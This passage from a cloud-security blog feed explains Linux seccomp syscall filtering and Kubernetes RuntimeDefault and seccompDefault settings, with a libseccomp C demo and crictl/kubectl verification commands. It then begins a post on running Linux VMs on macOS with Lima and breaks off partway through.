Unable to dump key: Operation not permitted
</code></pre>
<p>Voila, syscall filtering at its finest. But what exactly is that filter?</p>
<hr />
<h2 id="heading-the-actual-runtimedefault-profile">The Actual RuntimeDefault Profile</h2>
<p>If you want to see what <code>RuntimeDefault</code> really means on <em>your</em> node (and why wouldn't you?), inspect the OCI runtime spec the container runtime handed to <code>runc</code>.</p>
<p>First, list running containers and grab a container ID:</p>
<pre><code class="lang-bash">matt@cp:~/seccomp$ sudo crictl ps | grep yes-seccomp
...
d7ebc42cadd5f       2af158aaca82b       14 minutes ago      Running             nginx                       0                   e3aa4f4782108       yes-seccomp-796856b464-hqq44               default
</code></pre>
<p>Now inspect the container and extract the exact seccomp configuration from the runtime spec:</p>
<pre><code class="lang-bash">matt@cp:~/seccomp$ sudo crictl inspect d7ebc42cadd5f | jq <span class="hljs-string">'.info.runtimeSpec.linux.seccomp'</span>
</code></pre>
<p>If seccomp is enabled, you’ll see something like:</p>
<pre><code class="lang-json">{
  <span class="hljs-attr">"architectures"</span>: [
    <span class="hljs-string">"SCMP_ARCH_ARM"</span>,
    <span class="hljs-string">"SCMP_ARCH_AARCH64"</span>
  ],
  <span class="hljs-attr">"defaultAction"</span>: <span class="hljs-string">"SCMP_ACT_ERRNO"</span>,
  <span class="hljs-attr">"syscalls"</span>: [
    {
      <span class="hljs-attr">"action"</span>: <span class="hljs-string">"SCMP_ACT_ALLOW"</span>,
      <span class="hljs-attr">"names"</span>: [
        <span class="hljs-string">"accept"</span>,
        <span class="hljs-string">"accept4"</span>,
...
          <span class="hljs-string">"op"</span>: <span class="hljs-string">"SCMP_CMP_MASKED_EQ"</span>,
          <span class="hljs-string">"value"</span>: <span class="hljs-number">2114060288</span>
        }
      ],
      <span class="hljs-attr">"names"</span>: [
        <span class="hljs-string">"clone"</span>
      ]
    },
    {
      <span class="hljs-attr">"action"</span>: <span class="hljs-string">"SCMP_ACT_ERRNO"</span>,
      <span class="hljs-attr">"errnoRet"</span>: <span class="hljs-number">38</span>,
      <span class="hljs-attr">"names"</span>: [
        <span class="hljs-string">"clone3"</span>
      ]
    }
  ]
}
</code></pre>
<p>This is the actual seccomp profile applied to the container. And it is easy to see what is explicitly allowed by looking at the names of syscalls under <code>SCMP_ACT_ALLOW</code>.</p>
<p>And if you want to know exactly how many syscalls are allowed, it is easy to count them.</p>
<pre><code class="lang-bash">matt@cp:~/seccomp$ sudo crictl inspect d7ebc42cadd5f | jq <span class="hljs-string">'
  .info.runtimeSpec.linux.seccomp.syscalls
  | map(.names) | add
  | unique
  | length
'</span>
...
377
</code></pre>
<hr />
<h2 id="heading-unconfined-and-privileged">Unconfined and Privileged</h2>
<p><code>RuntimeDefault</code> is a baseline. But it’s not guaranteed. In Kubernetes, seccomp can be explicitly disabled:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">securityContext:</span>
  <span class="hljs-attr">seccompProfile:</span>
    <span class="hljs-attr">type:</span> <span class="hljs-string">Unconfined</span>
</code></pre>
<p>That tells the runtime not to attach a seccomp filter at all. When that happens, the container process runs with full access to the kernel’s syscall surface (subject to capabilities and LSMs, but without syscall filtering).</p>
<p>Adjust the deployment with this new <code>securityContext</code> and you can verify it the same way as before:</p>
<pre><code class="lang-bash">matt@cp:~/seccomp$ kubectl <span class="hljs-built_in">exec</span> unconfined-seccomp-6489c66986-vslvv -- grep Seccomp /proc/1/status
Seccomp:    0
Seccomp_filters:    0
</code></pre>
<p>There’s another common way seccomp effectively disappears: privileged containers. When a container runs privileged, it is granted elevated access to the host.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">securityContext:</span>
  <span class="hljs-attr">privileged:</span> <span class="hljs-literal">true</span>
  <span class="hljs-attr">seccompProfile:</span>
    <span class="hljs-attr">type:</span> <span class="hljs-string">RuntimeDefault</span>
</code></pre>
<p>Adjust the deployment with this new <code>securityContext</code> and you can verify it the same way as before:</p>
<pre><code class="lang-bash">matt@cp:~/seccomp$ kubectl <span class="hljs-built_in">exec</span> priv-seccomp-57778f5d79-zdm9x -- grep Seccomp /proc/1/status
Seccomp:    0
Seccomp_filters:    0
</code></pre>
<p>As you can see, privileged wiped out the intent of the <code>seccompProfile</code>. User beware.</p>
<hr />
<h2 id="heading-making-seccomp-the-default-kubeadm">Making Seccomp the Default (kubeadm)</h2>
<p>Declaring <code>RuntimeDefault</code> in every pod spec works. But there’s another way, and the CIS Kubernetes Benchmark calls it out under 4.2.14.</p>
<p>Modern Kubernetes supports making the runtime’s default seccomp profile the automatic baseline for all pods that don’t explicitly specify one. On kubeadm clusters, this is controlled by the kubelet.</p>
<p>You want:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">seccompDefault:</span> <span class="hljs-literal">true</span>
</code></pre>
<p>You can verify whether it’s enabled on a node:</p>
<pre><code class="lang-bash">kubectl proxy &amp;
curl -s http://127.0.0.1:8001/api/v1/nodes/&lt;node-name&gt;/proxy/configz | jq <span class="hljs-string">'.kubeletconfig.seccompDefault'</span>
</code></pre>
<p>If it returns <code>true</code>, pods without an explicit <code>seccompProfile</code> will automatically run under the runtime’s default profile.</p>
<p>If it’s <code>false</code>, a pod that doesn’t declare seccomp may run completely unconfined.</p>
<p>To enable it in kubeadm, update your <code>KubeletConfiguration</code>, which should be in <code>/var/lib/kubelet/config.yaml</code>. Simply add the default setting.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">seccompDefault:</span> <span class="hljs-literal">true</span>
</code></pre>
<p>Then apply the configuration and restart the kubelet. With <code>seccompDefault: true</code>, <code>RuntimeDefault</code> becomes the cluster-wide baseline instead of an opt-in setting. Not too bad.</p>
<hr />
<h2 id="heading-wrap-up">Wrap Up</h2>
<p>It’s tempting to treat <code>RuntimeDefault</code> as some kind of security panacea, but of course it isn't.</p>
<p>The runtime’s default seccomp profile is designed to be broadly compatible. It allows hundreds of syscalls because most applications need them.</p>
<p>What it blocks are the obvious outliers like kernel keyring manipulation (bet you didn't think I would go there). That’s valuable. It reduces attack surface. But it does not create tight isolation.</p>
<p>If your application only needs 80 syscalls, and the runtime allows 377, you’re still exposing far more kernel surface than strictly necessary.</p>
<p><code>RuntimeDefault</code> is a baseline hygiene control.</p>
<p>It says:</p>
<blockquote>
<p>“We’re not going to allow clearly dangerous or unnecessary syscalls.”</p>
</blockquote>
<p>It does not say:</p>
<blockquote>
<p>“This workload has a minimal, workload-specific syscall surface.”</p>
</blockquote>
<p>For many teams, RuntimeDefault is the right tradeoff. It’s low friction, broadly safe, and rarely breaks applications. But it’s not a sandbox. It’s a compatibility-first safety net.</p>
]]></content:encoded></item><item><title><![CDATA[Seccomp: The Syscall Firewall]]></title><description><![CDATA[Introduction
We’ve already covered two Linux security mechanisms that show up in Kubernetes securityContext:

LSMs (mainly AppArmor)  
Capabilities.

Both matter. Both do real work. But there’s a third piece that’s just as important: seccomp.
If capa...]]></description><link>https://cloudsecburrito.com/seccomp-the-syscall-firewall</link><guid isPermaLink="true">https://cloudsecburrito.com/seccomp-the-syscall-firewall</guid><category><![CDATA[Linux]]></category><category><![CDATA[Kubernetes]]></category><category><![CDATA[Seccomp]]></category><category><![CDATA[Security]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Thu, 05 Feb 2026 08:06:51 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1770279397832/189be66f-f491-4476-aef9-9434bdc85ef6.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-introduction">Introduction</h2>
<p>We’ve already covered two Linux security mechanisms that show up in Kubernetes <code>securityContext</code>:</p>
<ul>
<li><a target="_blank" href="https://cloudsecburrito.com/kubernetes-runtime-enforcement-with-kubearmor">LSMs (mainly AppArmor)</a></li>
<li><a target="_blank" href="https://cloudsecburrito.com/linux-capabilities-a-beginners-overview">Capabilities</a></li>
</ul>
<p>Both matter. Both do real work. But there’s a third piece that’s just as important: <strong>seccomp</strong>.</p>
<p>If capabilities define <em>what powers a process has</em>, seccomp defines <em>which syscalls it’s even allowed to attempt</em>. It doesn’t care who you are or whether you’re root. It sits at the syscall boundary and says:</p>
<blockquote>
<p>This syscall exists.<br />That one doesn’t.<br />Try anyway and the kernel shuts it down.</p>
</blockquote>
<p><a target="_blank" href="https://man7.org/linux/man-pages/man2/seccomp.2.html">Seccomp</a> isn’t a Kubernetes feature. It’s a Linux kernel mechanism that predates containers, evolving from a blunt “read/write/exit” sandbox into a BPF-powered filter that decides which syscalls are allowed to exist at all.</p>
<p>The pattern should feel familiar:</p>
<ul>
<li><p>Root used to mean “try anything”</p>
</li>
<li><p>Capabilities split that power into smaller pieces</p>
</li>
</ul>
<p>Seccomp applies the same idea to syscalls:</p>
<ul>
<li><p>Old world: call whatever you want and see what happens</p>
</li>
<li><p>Seccomp: the kernel stops you before anything happens</p>
</li>
</ul>
<p>That distinction matters. Capabilities decide whether a syscall <em>succeeds</em>. LSMs decide whether a resource is <em>accessible</em>. <strong>Seccomp decides whether the syscall ever runs.</strong> Same kernel, different choke points.</p>
<p>This post stays focused on seccomp as a Linux primitive. This means where it comes from, how syscall filtering actually works, and what it means to block a syscall at the kernel boundary. We'll get to YAML and "hardening checklists" later.</p>
<hr />
<h2 id="heading-orientation-diagram-where-seccomp-intercepts-syscalls">Orientation Diagram: Where Seccomp Intercepts Syscalls</h2>
<p>Keep this diagram in mind. Everything in this post is about what happens at the syscall boundary. This is before permissions, before resources, and before the kernel ever executes a syscall. This is about where seccomp lives in Linux.  </p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1770161814784/94a3eef4-8d31-4066-83a7-57cb0f06ca10.png" alt class="image--center mx-auto" /></p>
<hr />
<h2 id="heading-where-seccomp-runs-in-the-kernel">Where Seccomp Runs in the Kernel</h2>
<p>Seccomp doesn’t live inside a syscall implementation, and it doesn’t care what the syscall is <em>trying</em> to do. Once enabled, the kernel evaluates seccomp <strong>before</strong> it dispatches the syscall to its real handler. If the filter says no, the syscall never executes.</p>
<p>That ordering is a key detail. When a process makes a syscall, the kernel first checks whether seccomp is active for that process. If it is, the kernel runs the attached BPF filter and asks a single question: Is this syscall allowed to exist for this process?</p>
<p>Only an explicit allow causes the kernel to continue. Otherwise, the kernel returns an error, sends a signal, or kills the process, never reaching the syscall’s implementation. From the kernel’s perspective, a blocked syscall is indistinguishable from one that was never there.</p>
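<p>As pseudocode, the ordering looks roughly like this (a sketch with invented helper names, not actual kernel source):</p>

```c
/* Sketch of syscall entry with seccomp active -- invented helper names,
 * not real kernel code, just the ordering described above. */
long syscall_entry(int nr, long args[6]) {
    if (current->seccomp.mode != SECCOMP_MODE_DISABLED) {
        switch (run_bpf_filter(current->seccomp.filter, nr, args)) {
        case ALLOW: break;                /* fall through to dispatch */
        case ERRNO: return -EPERM;        /* syscall never executes   */
        case TRAP:  send_sigsys(current); /* deliver a signal instead */
        case KILL:  kill_task(current);   /* terminate the process    */
        }
    }
    return syscall_table[nr](args);       /* the real implementation  */
}
```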
<h3 id="heading-why-seccomp-is-a-different-control-layer">Why Seccomp Is a Different Control Layer</h3>
<p>This is also why seccomp doesn’t overlap cleanly with capabilities or LSMs.</p>
<p>Capabilities and LSMs operate <strong>after</strong> the syscall has already been selected:</p>
<ul>
<li><p>Capabilities decide whether a syscall is allowed to perform privileged actions</p>
</li>
<li><p>LSMs decide whether access to a specific object (file, socket, mount) is permitted</p>
</li>
</ul>
<p>Seccomp runs earlier than both. It doesn’t reason about permissions or resources. It only answers whether a syscall is permitted to run at all. That makes seccomp the earliest enforcement point. It is a hard gate in front of the syscall table itself.</p>
<h3 id="heading-the-one-way-property">The One-Way Property</h3>
<p>Once a process enters a seccomp mode, it cannot leave it.</p>
<p>The kernel enforces seccomp as a one-way transition: unrestricted to restricted, never the reverse. The active seccomp state is stored directly on the process and inherited across forks and execs. There is no API to remove or weaken a filter once it’s in place. Seccomp is designed so a process can only reduce its own attack surface, never expand it later.</p>
<p>This raises two obvious questions: Who enables seccomp in the first place and when does that happen?</p>
<hr />
<h2 id="heading-how-seccomp-gets-enabled">How Seccomp Gets Enabled</h2>
<p>Seccomp doesn’t apply itself automatically, and it isn’t something the kernel turns on by default. A process only enters a secure computing state when something explicitly asks the kernel to enable it.</p>
<p>That "something" is usually:</p>
<ul>
<li><p>the process itself</p>
</li>
<li><p>or a parent process acting as a supervisor (systemd, a container runtime, a sandbox)</p>
</li>
</ul>
<p>At the kernel level, this happens through two syscalls:</p>
<ul>
<li><p><code>prctl()</code></p>
</li>
<li><p><code>seccomp()</code></p>
</li>
</ul>
<p>Both tell the kernel to place the current process into a seccomp mode.</p>
<h3 id="heading-seccomp-is-enabled-per-process">Seccomp Is Enabled Per Process</h3>
<p>Seccomp is a per-process setting. When it’s enabled, the kernel records that state directly on the process:</p>
<pre><code class="lang-bash">task_struct.seccomp.mode
task_struct.seccomp.filter
</code></pre>
<p>From that point on:</p>
<ul>
<li><p>every syscall made by the process is subject to seccomp checks</p>
</li>
<li><p>all threads in the process share the same seccomp state</p>
</li>
<li><p>child processes created via <code>fork()</code> inherit it</p>
</li>
<li><p><code>execve()</code> does not reset it</p>
</li>
</ul>
<p>This transition is one-way: unrestricted → restricted. There is no mechanism to remove or weaken a filter once it’s active.</p>
<h3 id="heading-what-prctl-is">What <code>prctl()</code> Is</h3>
<p><code>prctl()</code> isn’t part of the normal syscall execution path. It’s a configuration syscall used to change process behavior.</p>
<p>When a program calls:</p>
<pre><code class="lang-c">prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &amp;filter);
</code></pre>
<p>it isn’t routing syscalls through <code>prctl()</code>. It’s making a one-time request: Attach this seccomp filter to the current process. After that, <code>prctl()</code> is out of the picture. All future syscalls follow the normal entry path. They just get evaluated by seccomp first.</p>
<h3 id="heading-who-enables-seccomp-in-practice">Who Enables Seccomp in Practice</h3>
<p>Most applications don’t enable seccomp themselves. Instead, it’s usually done by whatever launches the process:</p>
<ul>
<li><p><strong>systemd</strong></p>
</li>
<li><p><strong>container runtimes</strong> </p>
</li>
<li><p><strong>application sandboxes</strong> </p>
</li>
</ul>
<p>The pattern is consistent:</p>
<ol>
<li><p>The parent process loads a seccomp filter</p>
</li>
<li><p>It enables seccomp on the child <em>before exec</em></p>
</li>
<li><p>The application starts already inside a secure computing state</p>
</li>
</ol>
<p>By the time application code runs, seccomp is already enforced.</p>
<hr />
<h2 id="heading-where-we-are-so-far">Where We Are So Far</h2>
<p>So far, we’ve stayed intentionally close to the kernel.</p>
<p>We’ve looked at where seccomp runs in the syscall path, how it gets enabled, and how a syscall can be blocked before the kernel ever executes it. That’s the core idea: seccomp reduces attack surface by deciding which syscalls are allowed to exist for a process.</p>
<p>At this point, we’ve talked about seccomp in the abstract. The next step is to make that concrete. But, before we look at a real example, we need to clarify one last piece of terminology: what a “seccomp profile” actually is under the hood.</p>
<hr />
<h2 id="heading-what-a-seccomp-profile-actually-is">What a Seccomp “Profile” Actually Is</h2>
<p>A seccomp profile is <strong>not</strong> a policy language, nor a permissions model, and definitely not a Kubernetes abstraction.</p>
<p>At the kernel level, a seccomp profile is simply this:</p>
<blockquote>
<p><strong>A BPF program attached to a process that evaluates every syscall before it runs.</strong> Check out more on BPF <a target="_blank" href="https://docs.kernel.org/bpf/">here</a>.</p>
</blockquote>
<p>Everything else is packaging.</p>
<h3 id="heading-profiles-are-filters-not-rules">Profiles Are Filters, Not Rules</h3>
<p>When seccomp runs in filter mode, the kernel executes a BPF program on every syscall. That program receives a small amount of context (the syscall number, its arguments, and the architecture). Then it gives a verdict.</p>
<p>That verdict isn’t abstract. It’s one of a small set of concrete actions:</p>
<ul>
<li><p>allow the syscall to proceed</p>
</li>
<li><p>return an error (for example, <code>EPERM</code>)</p>
</li>
<li><p>send a signal</p>
</li>
<li><p>or terminate the process</p>
</li>
</ul>
<p>There’s no concept of users, roles, or resources here. The filter doesn’t know <em>why</em> a syscall is happening, only <em>which</em> syscall it is.</p>
<h3 id="heading-default-deny-is-the-point">Default-Deny Is the Point</h3>
<p>Real seccomp profiles often start from a default-deny action such as:</p>
<pre><code class="lang-bash">SCMP_ACT_ERRNO
</code></pre>
<p>and then explicitly allow only the syscalls the process needs. This isn’t about detecting bad behavior. It’s about reducing attack surface. From the kernel’s perspective, allowed syscalls exist; everything else does not.</p>
<p>Capabilities and LSMs can only restrict what a syscall is allowed to do. Seccomp can prevent the syscall from running at all.</p>
<h3 id="heading-tooling-is-just-a-compiler">Tooling Is Just a Compiler</h3>
<p>Most people never write BPF by hand. Instead, they interact with seccomp through tools and profile formats:</p>
<ul>
<li><p><code>libseccomp</code></p>
</li>
<li><p>runtime-provided defaults</p>
</li>
<li><p>human-readable profile files</p>
</li>
</ul>
<p>All of these do the same thing:</p>
<ol>
<li><p>Take a list of allowed syscalls</p>
</li>
<li><p>Compile it into a BPF program</p>
</li>
<li><p>Attach that program to the process</p>
</li>
</ol>
<p>Once the filter is loaded, the kernel doesn’t care how it was generated. At runtime, we get a BPF program and a verdict.</p>
<p>Let's go full burrito and see how it actually works.</p>
<hr />
<h2 id="heading-a-concrete-example-what-seccomp-actually-does">A Concrete Example: What Seccomp Actually Does</h2>
<p>Let's walk through a tiny program that installs a seccomp filter at runtime and then makes a few syscalls before and after that filter is in place. The goal isn’t to write production-grade seccomp policy. We just want to make the enforcement behavior obvious.</p>
<h3 id="heading-what-were-trying-to-show">What We’re Trying to Show</h3>
<p>This program is intentionally simple, and it runs in a very specific order:</p>
<ul>
<li><p>It makes a few normal syscalls (<code>getpid()</code>, <code>uname()</code>) before any filtering is applied</p>
</li>
<li><p>It installs a seccomp <strong>filter-mode</strong> profile at runtime</p>
</li>
<li><p>It repeats those same syscalls after the filter is active</p>
</li>
<li><p>One syscall still succeeds because it’s explicitly allowed</p>
</li>
<li><p>One syscall fails because seccomp blocks it at the syscall boundary</p>
</li>
</ul>
<p>That before-and-after contrast lets us see seccomp doing exactly what it’s designed to do: <strong>stop a syscall before the kernel ever executes it</strong>.</p>
<p>To make the behavior obvious, the filter allows only a small set of syscalls:</p>
<ul>
<li><p><code>getpid()</code></p>
</li>
<li><p><code>read</code>, <code>write</code>, <code>exit</code>, <code>exit_group</code></p>
</li>
</ul>
<p>Everything else is implicitly denied, including:</p>
<ul>
<li><code>uname()</code></li>
</ul>
<p>Any syscall that isn’t explicitly allowed will fail with <code>EPERM</code>.</p>
<h3 id="heading-the-demo-program">The Demo Program</h3>
<pre><code class="lang-c"><span class="hljs-comment">// seccomp_demo.c</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> _GNU_SOURCE</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;seccomp.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;stdio.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;stdlib.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;unistd.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;errno.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;string.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;sys/utsname.h&gt;</span></span>

<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">die</span><span class="hljs-params">(<span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> *msg)</span> </span>{
    perror(msg);
    <span class="hljs-built_in">exit</span>(EXIT_FAILURE);
}

<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">print_uname</span><span class="hljs-params">(<span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> *label)</span> </span>{
    <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">utsname</span> <span class="hljs-title">u</span>;</span>
    <span class="hljs-keyword">int</span> rc = uname(&amp;u);
    <span class="hljs-keyword">if</span> (rc == <span class="hljs-number">-1</span>) {
        <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%s: uname() failed: errno=%d (%s)\n"</span>,
               label, errno, strerror(errno));
    } <span class="hljs-keyword">else</span> {
        <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%s: uname() ok: sysname=%s, release=%s\n"</span>,
               label, u.sysname, u.release);
    }
}

<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">install_seccomp_filter</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{
    <span class="hljs-keyword">int</span> rc;
    scmp_filter_ctx ctx;

    ctx = seccomp_init(SCMP_ACT_ERRNO(EPERM));
    <span class="hljs-keyword">if</span> (ctx == <span class="hljs-literal">NULL</span>) {
        die(<span class="hljs-string">"seccomp_init"</span>);
    }

    rc  = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), <span class="hljs-number">0</span>);
    rc |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), <span class="hljs-number">0</span>);
    rc |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(<span class="hljs-built_in">exit</span>), <span class="hljs-number">0</span>);
    rc |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), <span class="hljs-number">0</span>);
    rc |= seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getpid), <span class="hljs-number">0</span>);

    <span class="hljs-keyword">if</span> (rc &lt; <span class="hljs-number">0</span>) {
        seccomp_release(ctx);
        die(<span class="hljs-string">"seccomp_rule_add"</span>);
    }

    rc = seccomp_load(ctx);
    <span class="hljs-keyword">if</span> (rc &lt; <span class="hljs-number">0</span>) {
        seccomp_release(ctx);
        die(<span class="hljs-string">"seccomp_load"</span>);
    }

    seccomp_release(ctx);
}

<span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">main</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{
    <span class="hljs-built_in">printf</span>(<span class="hljs-string">"== Before seccomp ==\n"</span>);

    <span class="hljs-keyword">pid_t</span> pid = getpid();
    <span class="hljs-built_in">printf</span>(<span class="hljs-string">"before: getpid() = %d\n"</span>, pid);

    print_uname(<span class="hljs-string">"before"</span>);

    <span class="hljs-built_in">printf</span>(<span class="hljs-string">"\nInstalling seccomp filter (default DENY, allow read/write/exit/getpid)...\n\n"</span>);
    install_seccomp_filter();

    <span class="hljs-built_in">printf</span>(<span class="hljs-string">"== After seccomp ==\n"</span>);

    pid = getpid();
    <span class="hljs-built_in">printf</span>(<span class="hljs-string">"after: getpid() = %d (still works)\n"</span>, pid);

    print_uname(<span class="hljs-string">"after"</span>);

    <span class="hljs-built_in">printf</span>(<span class="hljs-string">"\nDone.\n"</span>);
    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
}
</code></pre>
<h3 id="heading-prereqs">Prereqs</h3>
<p>Ensure you have the libseccomp development headers installed.</p>
<pre><code class="lang-bash">matt@cp:~/seccomp$ sudo apt update
sudo apt install -y libseccomp-dev
</code></pre>
<h3 id="heading-compile-and-run">Compile and Run</h3>
<pre><code class="lang-bash">matt@cp:~/seccomp$ gcc -o seccomp_demo seccomp_demo.c -lseccomp
matt@cp:~/seccomp$ ./seccomp_demo
== Before seccomp ==
before: getpid() = 10746
before: uname() ok: sysname=Linux, release=6.8.0-90-generic

Installing seccomp filter (default DENY, allow <span class="hljs-built_in">read</span>/write/<span class="hljs-built_in">exit</span>/getpid)...

== After seccomp ==
after: getpid() = 10746 (still works)
after: uname() failed: errno=1 (Operation not permitted)

Done.
</code></pre>
<p>At this point, we’ve seen seccomp in action!</p>
<hr />
<h2 id="heading-what-actually-happened">What Actually Happened</h2>
<p>Before seccomp was enabled, the program’s syscalls followed the normal execution path. Calls like <code>getpid()</code> and <code>uname()</code> entered the kernel, were dispatched to their respective implementations, and returned results as expected. When the seccomp filter was installed, the kernel attached a BPF program to the process and marked it as running in seccomp filter mode. From that point on, every syscall issued by the process was evaluated against that filter before the kernel considered executing it.</p>
<p>After seccomp was active, <code>getpid()</code> continued to work because it matched an explicit allow rule. The call to <code>uname()</code>, however, did not. The seccomp filter returned a denial verdict, and the kernel immediately enforced it by returning an error to userspace. The <code>sys_uname()</code> implementation was never reached.</p>
<p>Nothing else happened behind the scenes. There was no permission check, no resource evaluation, and no fallback logic. The syscall was intercepted, a verdict was returned, and the kernel enforced it.</p>
<p>That is seccomp doing exactly what it is designed to do.</p>
<hr />
<h2 id="heading-wrap-up">Wrap Up</h2>
<p>The demo showed seccomp doing one thing, very reliably: preventing a syscall from ever reaching the kernel implementation. Once a filter returns a verdict, the kernel enforces it and moves on. That enforcement point is what makes seccomp different from the other kernel controls we’ve looked at. Capabilities constrain what a syscall can do. LSMs constrain what a syscall can touch. Seccomp runs earlier than both and reduces attack surface by deciding which syscalls are allowed to exist in the first place.</p>
<p>This is why seccomp works best as a complement, not a replacement. It doesn’t understand intent, resources, or permissions, but it doesn’t need to. Its job is to shrink the set of possible behaviors before any of those questions even come up.</p>
<p>This post stayed intentionally close to the kernel. Before seccomp appears as a profile, a default, or a field in configuration, it’s a Linux mechanism with specific behavior and tradeoffs. Understanding that behavior is what makes higher-level abstractions predictable instead of mysterious.</p>
<p>In the next post, we’ll move up a layer and look at how container runtimes and Kubernetes wire this kernel primitive into pods. And we'll see why defaults like <code>RuntimeDefault</code> matter more than they first appear.</p>
]]></content:encoded></item><item><title><![CDATA[Lima: Linux on macOS Without the Ceremony]]></title><description><![CDATA[Introduction
Start with Linux. On macOS, if you want to do real container or Kubernetes work, the first decision isn’t Kubernetes at all, but rather how you’re going to run Linux. So far, my default approach has been a full Linux VM via UTM, with the...]]></description><link>https://cloudsecburrito.com/lima-linux-on-macos-without-the-ceremony</link><guid isPermaLink="true">https://cloudsecburrito.com/lima-linux-on-macos-without-the-ceremony</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[macOS]]></category><category><![CDATA[Linux]]></category><category><![CDATA[virtual machine]]></category><category><![CDATA[Lima]]></category><category><![CDATA[containers]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Thu, 29 Jan 2026 00:41:53 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1769647081684/f3891db0-52e8-4e51-bc76-73b2dbd16183.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-introduction">Introduction</h2>
<p>Start with Linux. On macOS, if you want to do real container or Kubernetes work, the first decision isn’t Kubernetes at all, but rather how you’re going to run Linux. So far, my default approach has been a full Linux VM via UTM, with the OS depending on the goal: Ubuntu for familiarity, Talos for opinionated immutability, or something else when I want to experiment.</p>
<p>Kubernetes is a separate decision that comes after that. Once you have Linux, you choose how you want Kubernetes to show up:</p>
<ul>
<li><p>kubeadm when you want to understand how clusters are actually built</p>
</li>
<li><p>Talos when you want a tightly controlled, production-shaped system</p>
</li>
<li><p>Minikube when you want something running quickly and don’t care much about what it’s doing under the hood</p>
</li>
</ul>
<p>Linux VM first, Kubernetes second is honest, flexible, and how real clusters can come into existence. It’s also a lot of setup if all you want is a disposable sandbox.</p>
<p>This is where Lima changes the flow. <a target="_blank" href="https://lima-vm.io/">Lima</a> collapses those steps. It gives you an easy, disposable Linux VM. And if you want a lightweight Kubernetes setup, it is a great choice. Under the hood, it’s still VMs and still real Linux, but it’s optimized for iteration, not realism. That makes it an excellent starting point if you’re new, and a useful shortcut even if you’re already comfortable with kubeadm or Talos.</p>
<p>It’s not a replacement for a “real” cluster, but it is a faster way to get up and running.</p>
<p>If you take away one thing from this, it's this: stop running Minikube on your Mac.</p>
<hr />
<h2 id="heading-orientation-diagram-where-lima-fits">Orientation Diagram: Where Lima Fits</h2>
<p>Keep this diagram in mind. Everything in this post is about how quickly Lima gets you to a real Linux environment. It's not about changing how Linux or Kubernetes actually work.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1769647183318/38fb8c01-fa60-4ae6-bfa2-77d648e52ac0.png" alt class="image--center mx-auto" /></p>
<hr />
<h2 id="heading-what-lima-is">What Lima Is</h2>
<p>Lima is a developer-focused way to run Linux virtual machines on macOS. At its core, Lima does one thing well: it makes running Linux easy.</p>
<p>It orchestrates Linux VMs on the host, using either QEMU or Apple’s Virtualization.framework (vz), and handles the glue that makes those VMs usable for day-to-day work. This includes lifecycle management, networking, filesystem mounts, and access. You describe the VM you want, Lima starts it, and you interact with it directly.</p>
<p>Practically, that means:</p>
<ul>
<li><p>A real Linux instance running in a VM</p>
</li>
<li><p>SSH access by default</p>
</li>
<li><p>Port forwarding so services inside the VM are reachable from macOS</p>
</li>
<li><p>Filesystem mounts so the VM feels a bit more local</p>
</li>
</ul>
<p>There’s no GUI. Lima is designed to stay out of your way once the VM is running, just the way we like it.</p>
<p>At this point, it should be painfully obvious that Lima is a dead-simple way to get a lab running or do local testing without ceremony.</p>
<blockquote>
<p>On macOS, Lima can use either QEMU or Apple’s Virtualization.framework (vz, the default on recent macOS) as the underlying VM engine. I’m intentionally not going deep on the hypervisor layer here, which applies equally to UTM. This will get its own post in the future.</p>
</blockquote>
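<p>Under the hood, each instance is described by a small YAML template. Here’s a minimal sketch of what one looks like; the key names follow the Lima template format, but the image URL and sizes are illustrative, not a recommendation:</p>
<pre><code class="lang-yaml"># Minimal Lima template sketch (illustrative values).
# Save as mylab.yaml and start it with: limactl start ./mylab.yaml
images:
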